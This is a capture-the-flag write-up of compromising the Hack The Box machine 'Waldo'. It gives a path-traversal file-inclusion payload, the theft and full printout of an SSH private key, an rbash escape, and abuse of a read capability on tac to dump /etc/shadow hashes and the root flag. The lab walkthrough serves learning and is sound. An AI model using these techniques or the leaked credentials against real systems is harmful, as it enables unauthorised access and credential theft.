Details
This machine is Waldo from Hack The Box
Recon
root@kali:~# nmap -sV -p- -T4 10.10.10.87
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-04 16:54 EDT
Nmap scan report for 10.10.10.87
Host is up (0.060s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.5 (protocol 2.0)
80/tcp open http nginx 1.12.2
8888/tcp filtered sun-answerbook
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.29 secondsUser
Started on port 80
I clicked on the various options while monitoring the endpoints hit with the dev tools network tab
The data looked interesting so I fired up burp and clicked the name of one of them
I sent this to repeater and tried LFI
../../../../../../../etc/passwd
So I tried some bypasses encase there were any protections
So I had LFI, and interestingly the nobody user has a home directory. As fileRead.php allowed LFI, I tried readDir.php to see if I could get directory listings
The .monitor file caught my attention so I used my LFI to read it
I rebuilt the key
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl
mR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f
87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS
dGCc/gNpW/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN
o8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8/6pceowqs9ujRkNzH9T1lJq4Fx1V
vi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl/wdmuPEW6kU
vmzhRU3gcjuzwBET0TNejbL/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR/6
pKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5
8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q
1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox/05qoOBL4kQxUM7
VxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS
dVa3yLECgYEA7jk51MvUGSIFF6GkXsNb/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO
v0og0X/iROXAcp6Z9WGpIc6FhVgJd/4bNlTR+A/lWQwFt1b6l03xdsyaIyIWi9xr
xsb2sLNWP56A/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY
qFfdAWrvVZjp26Yf/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI
yzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1
/pAcw/+/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw/IMnLa3drm3CIAa32iU
LRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ/
lnN2n1WyTIyEuGA/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp
w7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9
1HLmBkDTjjj/xAJAZuiOF4Rs/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT
rj1BhUCzZCUgQABtpC6vYj/HLLlzpiC05AIEhDdvToPK/0WuY64fds0VccAYmMDr
X/PlAoGAS6UhbCm5TWZhtL/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2
DvVny8gKbM/OenwHnTlwRTEj5qdeAM40oj/mwCDc6kpV1lJXrW2R5mCH9zgbNFla
W0iKCBUAm5xZgU/YskMsCBMNmA8A5ndRWGFEFE+VGDVPaRie0ro=
-----END RSA PRIVATE KEY-----Which I saved and chmodded. I then tried it on ssh
root@kali:~# ssh nobody@10.10.10.87 -i ./key
Welcome to Alpine!
The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org>.
waldo:~$ The alpine part made me think it was a docker container.
waldo:~$ ls -la
total 20
drwxr-xr-x 1 nobody nobody 4096 Jul 24 2018 .
drwxr-xr-x 1 root root 4096 May 3 2018 ..
lrwxrwxrwx 1 root root 9 Jul 24 2018 .ash_history -> /dev/null
drwx------ 1 nobody nobody 4096 Jul 15 2018 .ssh
-rw------- 1 nobody nobody 1202 Jul 24 2018 .viminfo
-r-------- 1 nobody nobody 33 May 3 2018 user.txt
waldo:~$ cat user.txt
[REDACTED]But there was the user flag. I began to dig into the system and found I was actually connected to port 8888
waldo:/$ netstat -anlp
netstat: can't scan /proc - are you root?
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.87:8888 10.10.14.2:60490 ESTABLISHED -
tcp 0 0 :::80 :::* LISTEN -
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 :::8888 :::* LISTEN -
udp 0 0 10.10.10.87:41769 10.10.10.2:53 ESTABLISHED -So what was actually running on port 22? I tried ssh again with the key
waldo:/$ ssh monitor@localhost -i ~/.ssh/.monitor
Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64
&.
@@@,@@/ %
#*/%@@@@/.&@@,
@@@#@@#&@#&#&@@@,*%/
/@@@&###########@@&*(*
(@################%@@@@@. /**
@@@@&#############%@@@@@@@@@@@@@@@@@@@@@@@@%((/
%@@@@%##########&@@@.... .#%#@@@@@@@#
@@&%#########@@@@/ */@@@%(((@@@%
@@@#%@@%@@@, *&@@@&%(((#((((@@(
/(@@@@@@@ *&@@@@%((((((((((((#@@(
%/#@@@/@ @#/@ ..@@@@%(((((((((((#((#@@@@@@@@@@@@&#,
%@*(@#%@., /@@@@&(((((((((((((((&@@@@@@&#######%%@@@@# &
*@@@@@# .&@@@#(((#(#((((((((#%@@@@@%###&@@@@@@@@@&%##&@@@@@@/
/@@ #@@@&#(((((((((((#((@@@@@%%%%@@@@%#########%&@@@@@@@@&
*@@ *%@@@@#((((((((((((((#@@@@@@@@@@%####%@@@@@@@@@@@@###&@@@@@@@&
%@/ .&%@@%#(((((((((((((((#@@@@@@@&#####%@@@%#############%@@@&%##&@@/
@@@@@@%(((((((((((##(((@@@@&%####%@@@%#####&@@@@@@@@@@@@@@@&##&@@@@@@@@@/
@@@&(((#((((((((((((#@@@@@&@@@@######@@@###################&@@@&#####%@@*
@@#(((((((((((((#@@@@%&@@.,,.*@@@%#####@@@@@@@@@@@@@@@@@@@%####%@@@@@@@@@@
*@@%((((((((#@@@@@@@%#&@@,,.,,.&@@@#####################%@@@@@@%######&@@.
@@@#(#&@@@@@&##&@@@&#@@/,,,,,,,,@@@&######&@@@@@@@@&&%######%@@@@@@@@@@@
@@@@@@&%&@@@%#&@%%@@@@/,,,,,,,,,,/@@@@@@@#/,,.*&@@%&@@@@@@&%#####%@@@@.
.@@@###&@@@%%@(,,,%@&,.,,,,,,,,,,,,,.*&@@@@&(,*@&#@%%@@@@@@@@@@@@*
@@%##%@@/@@@%/@@@@@@@@@#,,,,.../@@@@@%#%&@@@@(&@&@&@@@@(
.@@&##@@,,/@@@@&(. .&@@@&,,,.&@@/ #@@%@@@@@&@@@/
*@@@@@&@@.*@@@ %@@@*,&@@ *@@@@@&.#/,@/
*@@&*#@@@@@@@& #@( .@@@@@@& ,@@@, @@@@@(,@/@@
*@@/@#.#@@@@@/ %@@@, .@@&%@@@ &@& @@*@@*(@@#
(@@/@,,@@&@@@ &@@,,(@@& .@@%/@@,@@
/@@@*,@@,@@@* @@@,,,,,@@@@. *@@@%,@@**@#
%@@.%@&,(@@@@, /&@@@@,,,,,,,%@@@@@@@@@@%,,*@@,#@,
,@@,&@,,,,(@@@@@@@(,,,,,.,,,,,,,,**,,,,,,.*@/,&@
&@,*@@.,,,,,..,,,,&@@%/**/@@*,,,,,&(.,,,.@@,,@@
/@%,&@/,,,,/@%,,,,,*&@@@@@#.,,,,,.@@@(,,(@@@@@(
@@*,@@,,,#@@@&*..,,,,,,,,,,,,/@@@@,*(,,&@/#*
*@@@@@(,,@*,%@@@@@@@&&#%@@@@@@@/,,,,,,,@@
@@*,,,,,,,,,.*/(//*,..,,,,,,,,,,,&@,
@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@
&@&,,,,,,,,,,,,,,,,,,,,,,,,,,,,&@#
%@(,,,,,,,,,,,,,,,,,,,,,,,,,,,@@
,@@,,,,,,,,@@@&&&%&@,,,,,..,,@@,
*@@,,,,,,,.,****,..,,,,,,,,&@@
(@(,,,.,,,,,,,,,,,,,,.,,,/@@
.@@,,,,,,,,,,,,,...,,,,,,@@
,@@@,,,,,,,,,,,,,,,,.(@@@
%@@@@&(,,,,*(#&@@@@@@,
Here's Waldo, where's root?
Last login: Tue Jul 24 08:09:03 2018 from 127.0.0.1
-rbash: alias: command not foundSo I got into an rbash. I tried some bypasses, eventually ending on
waldo:/$ ssh monitor@localhost -i ~/.ssh/.monitor -t "bash -noprofile"
monitor@waldo:~$ That got me out of the rbash, check if my PATH is broken
monitor@waldo:~$ export
[SNIP]
declare -x PATH="/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1"
[SNIP]It's broken, so I export a replacement
monitor@waldo:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binAnd began to look around
monitor@waldo:~$ cd app-dev
monitor@waldo:~/app-dev$ ls -la
total 2236
drwxrwx--- 3 app-dev monitor 4096 May 3 2018 .
drwxr-x--- 5 root monitor 4096 Jul 24 2018 ..
-rwxrwx--- 1 app-dev monitor 13704 Jul 24 2018 logMonitor
-r--r----- 1 app-dev monitor 13704 May 3 2018 logMonitor.bak
-rw-rw---- 1 app-dev monitor 2677 May 3 2018 logMonitor.c
-rw-rw---- 1 app-dev monitor 488 May 3 2018 logMonitor.h
-rw-rw---- 1 app-dev monitor 2217712 May 3 2018 logMonitor.h.gch
-rw-rw---- 1 app-dev monitor 6824 May 3 2018 logMonitor.o
-rwxr----- 1 app-dev monitor 266 May 3 2018 makefile
-r-xr-x--- 1 app-dev monitor 795 May 3 2018 .restrictScript.sh
drwxr-x--- 2 app-dev monitor 4096 May 3 2018 v0.1I checked the logmonitor
monitor@waldo:~/app-dev$ ./logMonitor -a
Cannot open file It can't read the file, so I look further
monitor@waldo:~/app-dev$ cd v0.1/
monitor@waldo:~/app-dev/v0.1$ ls -la
total 24
drwxr-x--- 2 app-dev monitor 4096 May 3 2018 .
drwxrwx--- 3 app-dev monitor 4096 May 3 2018 ..
-r-xr-x--- 1 app-dev monitor 13706 May 3 2018 logMonitor-0.1
monitor@waldo:~/app-dev/v0.1$ ./logMonitor-0.1 -a
Oct 4 17:17:01 waldo CRON[987]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 4 17:17:01 waldo CRON[987]: pam_unix(cron:session): session closed for user root
Oct 4 17:19:38 waldo sshd[1001]: User nobody from 127.0.0.1 not allowed because not listed in AllowUsers
Oct 4 17:19:38 waldo sshd[1001]: input_userauth_request: invalid user nobody [preauth]
Oct 4 17:19:38 waldo sshd[1001]: Connection closed by 127.0.0.1 port 37046 [preauth]
Oct 4 17:25:09 waldo sshd[1008]: User nobody from 127.0.0.1 not allowed because not listed in AllowUsers
Oct 4 17:25:09 waldo sshd[1008]: input_userauth_request: invalid user nobody [preauth]
[SNIP]This one can. But the permissions aren't different, so I checked it's capabilities
monitor@waldo:~/app-dev/v0.1$ getcap logMonitor-0.1
logMonitor-0.1 = cap_dac_read_search+eiBut I couldn't see any way of using this to spawn a shell or priv esc. So I decided to scan for any other files that have modified capabilities
monitor@waldo:~/app-dev/v0.1$ getcap -r / 2>/dev/null
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+eiSo tac has access to read files
monitor@waldo:~/app-dev/v0.1$ tac /etc/shadow
app-dev:$6$RQ4VUGfn$6WYq54MO9AvNFMW.FCRekOBPYJXuI02AqR5lYlwN5/eylTlTWmHlLLvJ4FDp4Nt0A/AX2b3zdrvyEfwf8vSh3/:17654:0:99999:7:::
monitor:$6$IXQ7fATd$RsOewky58ltAbfdjYBHFk9/q5bRcUplLnM9ZHKknVB46smsKn4msCOXDpyYU6xw43rGqJl5fG3sMmEaKhJAJt/:17654:0:99999:7:::
steve:$6$MmXo3me9$zPPUertAwnJYQM8GUya1rzCTKGr/AHtjSG2n3faSeupCCBjoaknUz2YUDStZtvUGWuXonFqXKZF8pXCkezJ.Q.:17653:0:99999:7:::
sshd:*:17653:0:99999:7:::
messagebus:*:17653:0:99999:7:::
avahi-autoipd:*:17653:0:99999:7:::
_apt:*:17653:0:99999:7:::
systemd-bus-proxy:*:17653:0:99999:7:::
systemd-resolve:*:17653:0:99999:7:::
systemd-network:*:17653:0:99999:7:::
systemd-timesync:*:17653:0:99999:7:::
nobody:*:17653:0:99999:7:::
gnats:*:17653:0:99999:7:::
irc:*:17653:0:99999:7:::
list:*:17653:0:99999:7:::
backup:*:17653:0:99999:7:::
www-data:*:17653:0:99999:7:::
proxy:*:17653:0:99999:7:::
uucp:*:17653:0:99999:7:::
news:*:17653:0:99999:7:::
mail:*:17653:0:99999:7:::
lp:*:17653:0:99999:7:::
man:*:17653:0:99999:7:::
games:*:17653:0:99999:7:::
sync:*:17653:0:99999:7:::
sys:*:17653:0:99999:7:::
bin:*:17653:0:99999:7:::
daemon:*:17653:0:99999:7:::
root:$6$tRIbOmog$v7fPb8FKIT0QryKrm7RstojMs.ZXi4xxHz2Uix9lsw52eWtsURc9dwWMOyt4Gpd6QLtVtDnU1NO5KE5gF48r8.:17654:0:99999:7:::So I can read shadow, so I can also read the flag
monitor@waldo:~/app-dev/v0.1$ tac /root/root.txt
[REDACTED]